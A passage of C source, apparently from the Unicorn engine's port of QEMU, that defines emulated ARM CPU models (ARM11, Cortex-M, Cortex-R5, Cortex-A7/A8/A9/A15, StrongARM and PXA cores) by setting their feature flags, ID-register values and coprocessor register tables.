0x0f004006; cpu->reset_sctlr = 0x00000078; } static void arm1026_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_AUXCR); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_TEST_CLEAN); cpu->midr = 0x4106a262; cpu->reset_fpsid = 0x410110a0; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00090078; cpu->reset_auxcr = 1; /* * ARMv5 does not have the ID_ISAR registers, but we can still * set the field to indicate Jazelle support within QEMU. */ FIELD_DP32(cpu->isar.id_isar1, ID_ISAR1, JAZELLE, 1, cpu->isar.id_isar1); /* * Similarly, we need to set MVFR0 fields to enable vfp and short vector * support even though ARMv5 doesn't have this register. */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSP, 1, cpu->isar.mvfr0); FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPDP, 1, cpu->isar.mvfr0); { /* The 1026 had an IFAR at c6,c0,0,1 rather than the ARMv6 c6,c0,0,2 */ ARMCPRegInfo ifar = { .name = "IFAR", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.ifar_ns), .resetvalue = 0 }; define_one_arm_cp_reg(cpu, &ifar); } } static void arm1136_r2_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); /* What qemu calls "arm1136_r2" is actually the 1136 r0p2, ie an * older core than plain "arm1136". In particular this does not * have the v6K features. * These ID register values are correct for 1136 but may be wrong * for 1136_r2 (in particular r0p2 does not actually implement most * of the ID registers). 
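 * (Both variants below share the 1136 ID register values; only the
 * MIDR differs: 0x4107b362 for this r0p2 model vs 0x4117b363 for
 * plain "arm1136".)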
*/ set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); cpu->midr = 0x4107b362; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0x2; cpu->id_afr0 = 0x3; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222110; cpu->isar.id_isar0 = 0x00140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231111; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 7; } static void arm1136_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); cpu->midr = 0x4117b363; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0x2; cpu->id_afr0 = 0x3; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222110; cpu->isar.id_isar0 = 0x00140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231111; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 7; } static void arm1176_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_VAPA); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CACHE_DIRTY_REG); set_feature(&cpu->env, ARM_FEATURE_CACHE_BLOCK_OPS); set_feature(&cpu->env, ARM_FEATURE_EL3); cpu->midr = 0x410fb767; cpu->reset_fpsid = 0x410120b5; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1dd20d2; cpu->reset_sctlr = 0x00050078; cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x33; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x01130003; cpu->isar.id_mmfr1 = 0x10030302; cpu->isar.id_mmfr2 = 0x01222100; cpu->isar.id_isar0 = 0x0140011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11231121; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x01141; cpu->reset_auxcr = 7; } static void arm11mpcore_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6K); set_feature(&cpu->env, ARM_FEATURE_VAPA); set_feature(&cpu->env, ARM_FEATURE_MPIDR); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x410fb022; cpu->reset_fpsid = 0x410120b4; cpu->isar.mvfr0 = 0x11111111; cpu->isar.mvfr1 = 0x00000000; cpu->ctr = 0x1d192992; /* 32K icache 32K dcache */ cpu->id_pfr0 = 0x111; cpu->id_pfr1 = 0x1; cpu->isar.id_dfr0 = 0; cpu->id_afr0 = 0x2; cpu->isar.id_mmfr0 = 0x01100103; cpu->isar.id_mmfr1 = 0x10020302; cpu->isar.id_mmfr2 = 0x01222000; cpu->isar.id_isar0 = 0x00100011; cpu->isar.id_isar1 = 0x12002111; cpu->isar.id_isar2 = 0x11221011; cpu->isar.id_isar3 = 0x01102131; cpu->isar.id_isar4 = 0x141; cpu->reset_auxcr = 1; } static void cortex_m0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V6); set_feature(&cpu->env, ARM_FEATURE_M); cpu->midr = 0x410cc200; } static void 
cortex_m3_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); cpu->midr = 0x410fc231; cpu->pmsav7_dregion = 8; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00000030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x00000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01141110; cpu->isar.id_isar1 = 0x02111000; cpu->isar.id_isar2 = 0x21112231; cpu->isar.id_isar3 = 0x01111110; cpu->isar.id_isar4 = 0x01310102; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m4_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x410fc240; /* r0p0 */ cpu->pmsav7_dregion = 8; cpu->isar.mvfr0 = 0x10110021; cpu->isar.mvfr1 = 0x11000011; cpu->isar.mvfr2 = 0x00000000; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00000030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x00000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01141110; cpu->isar.id_isar1 = 0x02111000; cpu->isar.id_isar2 = 0x21112231; cpu->isar.id_isar3 = 0x01111110; cpu->isar.id_isar4 = 0x01310102; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m7_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x411fc272; /* r1p2 */ cpu->pmsav7_dregion = 8; cpu->isar.mvfr0 = 0x10110221; cpu->isar.mvfr1 = 0x12000011; cpu->isar.mvfr2 = 0x00000040; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000200; cpu->isar.id_dfr0 = 0x00100000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00100030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01101110; cpu->isar.id_isar1 = 0x02112000; cpu->isar.id_isar2 = 0x20232231; cpu->isar.id_isar3 = 0x01111131; cpu->isar.id_isar4 = 0x01310132; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; } static void cortex_m33_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_M); set_feature(&cpu->env, ARM_FEATURE_M_MAIN); set_feature(&cpu->env, ARM_FEATURE_M_SECURITY); set_feature(&cpu->env, ARM_FEATURE_THUMB_DSP); cpu->midr = 0x410fd213; /* r0p3 */ cpu->pmsav7_dregion = 16; cpu->sau_sregion = 8; cpu->isar.mvfr0 = 0x10110021; cpu->isar.mvfr1 = 0x11000011; cpu->isar.mvfr2 = 0x00000040; cpu->id_pfr0 = 0x00000030; cpu->id_pfr1 = 0x00000210; cpu->isar.id_dfr0 = 0x00200000; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x00101F40; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01000000; cpu->isar.id_mmfr3 = 0x00000000; cpu->isar.id_isar0 = 0x01101110; cpu->isar.id_isar1 = 0x02212000; cpu->isar.id_isar2 = 0x20232232; cpu->isar.id_isar3 = 0x01111131; cpu->isar.id_isar4 = 0x01310132; cpu->isar.id_isar5 = 0x00000000; cpu->isar.id_isar6 = 0x00000000; cpu->clidr = 0x00000000; cpu->ctr = 0x8000c000; } static void 
arm_v7m_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { ARMCPUClass *acc = ARM_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); acc->info = data; cc->do_interrupt = arm_v7m_cpu_do_interrupt; cc->cpu_exec_interrupt = arm_v7m_cpu_exec_interrupt; } static ARMCPRegInfo cortexr5_cp_reginfo[] = { /* Dummy the TCM region regs for the moment */ { .name = "ATCM", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST }, { .name = "BTCM", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_CONST }, { .name = "DCACHE_INVAL", .cp = 15, .opc1 = 0, .crn = 15, .crm = 5, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static void cortex_r5_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_V7MP); set_feature(&cpu->env, ARM_FEATURE_PMSA); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x411fc153; /* r1p3 */ cpu->id_pfr0 = 0x0131; cpu->id_pfr1 = 0x001; cpu->isar.id_dfr0 = 0x010400; cpu->id_afr0 = 0x0; cpu->isar.id_mmfr0 = 0x0210030; cpu->isar.id_mmfr1 = 0x00000000; cpu->isar.id_mmfr2 = 0x01200000; cpu->isar.id_mmfr3 = 0x0211; cpu->isar.id_isar0 = 0x02101111; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232141; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x0010142; cpu->isar.id_isar5 = 0x0; cpu->isar.id_isar6 = 0x0; cpu->mp_is_up = true; cpu->pmsav7_dregion = 16; define_arm_cp_regs(cpu, cortexr5_cp_reginfo); } static void cortex_r5f_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); cortex_r5_initfn(uc, obj); cpu->isar.mvfr0 = 0x10110221; cpu->isar.mvfr1 = 0x00000011; } static const ARMCPRegInfo cortexa8_cp_reginfo[] = { { .name = "L2LOCKDOWN", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "L2AUXCR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 2, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void cortex_a8_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_EL3); cpu->midr = 0x410fc080; cpu->reset_fpsid = 0x410330c0; cpu->isar.mvfr0 = 0x11110222; cpu->isar.mvfr1 = 0x00011111; cpu->ctr = 0x82048004; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x1031; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x400; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x31100003; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01202000; cpu->isar.id_mmfr3 = 0x11; cpu->isar.id_isar0 = 0x00101111; cpu->isar.id_isar1 = 0x12112111; cpu->isar.id_isar2 = 0x21232031; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x00111142; cpu->isar.dbgdidr = 0x15141000; cpu->clidr = (1 << 27) | (2 << 24) | 3; cpu->ccsidr[0] = 0xe007e01a; /* 16k L1 dcache. */ cpu->ccsidr[1] = 0x2007e01a; /* 16k L1 icache. */ cpu->ccsidr[2] = 0xf0000000; /* No L2 icache. */ cpu->reset_auxcr = 2; define_arm_cp_regs(cpu, cortexa8_cp_reginfo); } static const ARMCPRegInfo cortexa9_cp_reginfo[] = { /* power_control should be set to maximum latency. 
Again, * default to 0 and set by private hook */ { .name = "A9_PWRCTL", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_power_control) }, { .name = "A9_DIAG", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_diagnostic) }, { .name = "A9_PWRDIAG", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c15_power_diagnostic) }, { .name = "NEONBUSY", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, /* TLB lockdown control */ { .name = "TLB_LOCKR", .cp = 15, .crn = 15, .crm = 4, .opc1 = 5, .opc2 = 2, .access = PL1_W, .resetvalue = 0, .type = ARM_CP_NOP }, { .name = "TLB_LOCKW", .cp = 15, .crn = 15, .crm = 4, .opc1 = 5, .opc2 = 4, .access = PL1_W, .resetvalue = 0, .type = ARM_CP_NOP }, { .name = "TLB_VA", .cp = 15, .crn = 15, .crm = 5, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, { .name = "TLB_PA", .cp = 15, .crn = 15, .crm = 6, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, { .name = "TLB_ATTR", .cp = 15, .crn = 15, .crm = 7, .opc1 = 5, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST }, REGINFO_SENTINEL }; static void cortex_a9_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_EL3); /* Note that A9 supports the MP extensions even for * A9UP and single-core A9MP (which are both different * and valid configurations; we don't model A9UP). */ set_feature(&cpu->env, ARM_FEATURE_V7MP); set_feature(&cpu->env, ARM_FEATURE_CBAR); cpu->midr = 0x410fc090; cpu->reset_fpsid = 0x41033090; cpu->isar.mvfr0 = 0x11110222; cpu->isar.mvfr1 = 0x01111111; cpu->ctr = 0x80038003; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x1031; cpu->id_pfr1 = 0x11; cpu->isar.id_dfr0 = 0x000; cpu->id_afr0 = 0; cpu->isar.id_mmfr0 = 0x00100103; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01230000; cpu->isar.id_mmfr3 = 0x00002111; cpu->isar.id_isar0 = 0x00101111; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x00111142; cpu->isar.dbgdidr = 0x35141000; cpu->clidr = (1 << 27) | (1 << 24) | 3; cpu->ccsidr[0] = 0xe00fe019; /* 16k L1 dcache. */ cpu->ccsidr[1] = 0x200fe019; /* 16k L1 icache. */ define_arm_cp_regs(cpu, cortexa9_cp_reginfo); } uint64_t a15_l2ctlr_read(CPUARMState *env, const ARMCPRegInfo *ri) { #if 0 MachineState *ms = MACHINE(qdev_get_machine()); /* Linux wants the number of processors from here. * Might as well set the interrupt-controller bit too. 
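 *
 * Sketch of the value built here: L2CTLR[25:24] is the core count
 * minus one, so e.g. ms->smp.cpus == 4 would yield
 * (3 << 24) | (1 << 23). With the machine model compiled out, the
 * live code below models a single core and only sets bit 23.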
*/ return ((ms->smp.cpus - 1) << 24) | (1 << 23); #endif return (1 << 23); } static ARMCPRegInfo cortexa15_cp_reginfo[] = { { .name = "L2CTLR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 2, .access = PL1_RW, .resetvalue = 0, .readfn = a15_l2ctlr_read, .writefn = arm_cp_write_ignore }, { .name = "L2ECTLR", .cp = 15, .crn = 9, .crm = 0, .opc1 = 1, .opc2 = 3, .access = PL1_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void cortex_a7_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7VE); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fc075; cpu->reset_fpsid = 0x41023075; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x11111111; cpu->ctr = 0x84448003; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x00001131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x02010555; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01240000; cpu->isar.id_mmfr3 = 0x02102211; /* a7_mpcore_r0p5_trm, page 4-4 gives 0x01101110; but * table 4-41 gives 0x02101110, which includes the arm div insns. */ cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x10011142; cpu->isar.dbgdidr = 0x3515f005; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ define_arm_cp_regs(cpu, cortexa15_cp_reginfo); /* Same as A15 */ } static void cortex_a15_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V7VE); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_THUMB2EE); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x412fc0f1; cpu->reset_fpsid = 0x410430f0; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x11111111; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50078; cpu->id_pfr0 = 0x00001131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x02010555; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10201105; cpu->isar.id_mmfr1 = 0x20000000; cpu->isar.id_mmfr2 = 0x01240000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232041; cpu->isar.id_isar3 = 0x11112131; cpu->isar.id_isar4 = 0x10011142; cpu->isar.dbgdidr = 0x3515f021; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32K L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32K L1 icache */ cpu->ccsidr[2] = 0x711fe07a; /* 4096K L2 unified cache */ define_arm_cp_regs(cpu, cortexa15_cp_reginfo); } static void ti925t_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V4T); set_feature(&cpu->env, ARM_FEATURE_OMAPCP); cpu->midr = ARM_CPUID_TI925T; cpu->ctr = 0x5109149; cpu->reset_sctlr = 0x00000070; } static void 
sa1100_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_STRONGARM); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x4401A11B; cpu->reset_sctlr = 0x00000070; } static void sa1110_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_STRONGARM); set_feature(&cpu->env, ARM_FEATURE_DUMMY_C15_REGS); cpu->midr = 0x6901B119; cpu->reset_sctlr = 0x00000070; } static void pxa250_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052100; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa255_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d00; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa260_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052903; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa261_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d05; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa262_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); cpu->midr = 0x69052d06; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270a0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054110; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270a1_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054111; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270b0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054112; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270b1_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054113; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270c0_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054114; cpu->ctr = 0xd172172; cpu->reset_sctlr = 0x00000078; } static void pxa270c5_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V5); set_feature(&cpu->env, ARM_FEATURE_XSCALE); set_feature(&cpu->env, ARM_FEATURE_IWMMXT); cpu->midr = 0x69054117; cpu->ctr = 0xd172172; 
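    /* All the PXA27x steppings in this block share CTR 0xd172172 and
     * reset SCTLR 0x00000078; only the MIDR revision field
     * distinguishes them. */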
cpu->reset_sctlr = 0x00000078; } #ifndef TARGET_AARCH64 /* -cpu max: if KVM is enabled, like -cpu host (best possible with this host); * otherwise, a CPU with as many features enabled as our emulation supports. * The version of '-cpu max' for qemu-system-aarch64 is defined in cpu64.c; * this only needs to handle 32 bits. */ static void arm_max_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); { cortex_a15_initfn(uc, obj); /* old-style VFP short-vector support */ FIELD_DP32(cpu->isar.mvfr0, MVFR0, FPSHVEC, 1, cpu->isar.mvfr0); // Unicorn: Enable this on ARM_MAX //#ifdef CONFIG_USER_ONLY /* We don't set these in system emulation mode for the moment, * since we don't correctly set (all of) the ID registers to * advertise them. */ set_feature(&cpu->env, ARM_FEATURE_V8); { uint32_t t; t = cpu->isar.id_isar5; FIELD_DP32(t, ID_ISAR5, AES, 2, t); FIELD_DP32(t, ID_ISAR5, SHA1, 1, t); FIELD_DP32(t, ID_ISAR5, SHA2, 1, t); FIELD_DP32(t, ID_ISAR5, CRC32, 1, t); FIELD_DP32(t, ID_ISAR5, RDM, 1, t); FIELD_DP32(t, ID_ISAR5, VCMA, 1, t); cpu->isar.id_isar5 = t; t = cpu->isar.id_isar6; FIELD_DP32(t, ID_ISAR6, JSCVT, 1, t); FIELD_DP32(t, ID_ISAR6, DP, 1, t); FIELD_DP32(t, ID_ISAR6, FHM, 1, t); FIELD_DP32(t, ID_ISAR6, SB, 